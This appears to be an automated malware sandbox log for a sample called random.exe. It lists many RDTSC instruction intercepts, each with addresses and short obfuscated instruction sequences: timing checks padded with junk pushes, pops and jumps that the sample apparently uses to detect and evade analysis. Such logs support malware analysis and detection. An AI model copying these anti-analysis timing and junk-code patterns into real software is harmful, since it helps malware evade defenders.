              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48E09D second address: 48E0A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48E0A3 second address: 48E0BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D14h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48E357 second address: 48E35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48E35D second address: 48E364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48E364 second address: 48E37F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007EFCE8B9234Bh 0x0000000c popad 0x0000000d jng 00007EFCE8B9234Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48E4DD second address: 48E52B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007EFCE8B91D12h 0x0000000d pushad 0x0000000e jp 00007EFCE8B91D06h 0x00000014 jc 00007EFCE8B91D06h 0x0000001a jmp 00007EFCE8B91D10h 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007EFCE8B91D0Dh 0x00000028 push ebx 0x00000029 push eax 0x0000002a pop eax 0x0000002b push edx 0x0000002c pop edx 0x0000002d pop ebx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48E52B second address: 48E53C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B9234Ah 0x00000007 push ecx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48EAD9 second address: 48EADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48EADD second address: 48EAE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 48D331 second address: 48D337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 492249 second address: 492262 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007EFCE8B92353h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 494DD6 second address: 494DE7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFCE8B91D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4978C6 second address: 4978CB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4978CB second address: 4978D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4978D1 second address: 4978D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49A30B second address: 49A343 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFCE8B91D0Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFCE8B91D17h 0x00000011 jmp 00007EFCE8B91D11h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49A761 second address: 49A76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFCE8B9234Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49A76F second address: 49A77B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007EFCE8B91D06h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49C1A7 second address: 49C1B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007EFCE8B92346h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49C1B1 second address: 49C1E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007EFCE8B91D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007EFCE8B91D0Eh 0x00000015 jmp 00007EFCE8B91D18h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49C1E6 second address: 49C202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007EFCE8B92356h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A0B7A second address: 4A0B9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007EFCE8B91D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007EFCE8B91D0Eh 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jc 00007EFCE8B91D06h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A0B9F second address: 4A0BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A0BA5 second address: 4A0BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 js 00007EFCE8B91D0Eh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A0BB6 second address: 4A0BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49FF68 second address: 49FF6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A00E6 second address: 4A010A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007EFCE8B92346h 0x00000009 jmp 00007EFCE8B92352h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A010A second address: 4A0117 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFCE8B91D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A0117 second address: 4A0124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007EFCE8B92346h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A0124 second address: 4A012E instructions: 0x00000000 rdtsc 0x00000002 je 00007EFCE8B91D0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A026C second address: 4A0272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A0272 second address: 4A0277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A0277 second address: 4A027C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A027C second address: 4A02A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jmp 00007EFCE8B91D18h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007EFCE8B91D0Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A02A7 second address: 4A02AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A02AD second address: 4A02B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007EFCE8B91D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A0419 second address: 4A042F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007EFCE8B9234Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A042F second address: 4A043B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A043B second address: 4A045E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jmp 00007EFCE8B92358h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A059D second address: 4A05A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A05A3 second address: 4A05AD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFCE8B92346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A7BAF second address: 4A7BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A7BB3 second address: 4A7BB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A7BB7 second address: 4A7BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A801D second address: 4A804D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFCE8B92353h 0x00000008 jmp 00007EFCE8B92358h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A804D second address: 4A8056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A8056 second address: 4A805C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A805C second address: 4A8062 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A84E6 second address: 4A84EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A84EA second address: 4A84F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4AFE45 second address: 4AFE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007EFCE8B92346h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B0393 second address: 4B03B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007EFCE8B91D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007EFCE8B91D17h 0x00000012 jmp 00007EFCE8B91D11h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B0644 second address: 4B0648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B0648 second address: 4B064E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B08C2 second address: 4B08F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007EFCE8B92346h 0x0000000a pop ebx 0x0000000b jnl 00007EFCE8B92361h 0x00000011 jne 00007EFCE8B92346h 0x00000017 jmp 00007EFCE8B92355h 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jnp 00007EFCE8B92346h 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B08F9 second address: 4B0904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B0904 second address: 4B090A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B090A second address: 4B0915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007EFCE8B91D06h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B0915 second address: 4B091A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B091A second address: 4B0920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B0C7D second address: 4B0C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFCE8B92358h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B0C99 second address: 4B0CBD instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFCE8B91D1Ah 0x00000008 jmp 00007EFCE8B91D14h 0x0000000d je 00007EFCE8B91D0Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B0FB5 second address: 4B0FCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007EFCE8B92346h 0x00000009 jnc 00007EFCE8B92346h 0x0000000f popad 0x00000010 pushad 0x00000011 jc 00007EFCE8B92346h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B0FCE second address: 4B0FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007EFCE8B91D0Ch 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B8F44 second address: 4B8F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFCE8B9234Dh 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B90BA second address: 4B90C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B90C0 second address: 4B90C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B90C6 second address: 4B90F4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFCE8B91D06h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007EFCE8B91D15h 0x00000014 jp 00007EFCE8B91D0Eh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B90F4 second address: 4B9111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007EFCE8B92351h 0x0000000b jno 00007EFCE8B92346h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B954D second address: 4B9557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007EFCE8B91D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B9557 second address: 4B9568 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B9234Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B9692 second address: 4B9698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B97F5 second address: 4B981F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007EFCE8B92346h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007EFCE8B9234Dh 0x00000011 jg 00007EFCE8B9234Ah 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B981F second address: 4B9823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B9823 second address: 4B982B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4B9B75 second address: 4B9B89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007EFCE8B91D0Ch 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C163C second address: 4C1640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C1640 second address: 4C164A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFCE8B91D06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C164A second address: 4C1669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007EFCE8B92357h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C1669 second address: 4C167B instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFCE8B91D06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C167B second address: 4C1690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007EFCE8B92346h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007EFCE8B92346h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C1690 second address: 4C169C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jg 00007EFCE8B91D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C169C second address: 4C16A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C16A2 second address: 4C16A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C16A6 second address: 4C16AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C16AA second address: 4C16CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007EFCE8B91D18h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C16CC second address: 4C16D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4BF7FC second address: 4BF802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4BF802 second address: 4BF807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4BFC44 second address: 4BFC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4BFE0E second address: 4BFE12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4BFE12 second address: 4BFE1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4BFE1E second address: 4BFE74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B9234Fh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007EFCE8B92346h 0x00000010 jmp 00007EFCE8B92356h 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jg 00007EFCE8B9234Ch 0x00000022 jmp 00007EFCE8B92353h 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C0274 second address: 4C029F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007EFCE8B91D12h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFCE8B91D0Eh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C029F second address: 4C02A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C05BB second address: 4C05EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007EFCE8B91D0Eh 0x00000011 jp 00007EFCE8B91D06h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C05EB second address: 4C05F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007EFCE8B92346h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
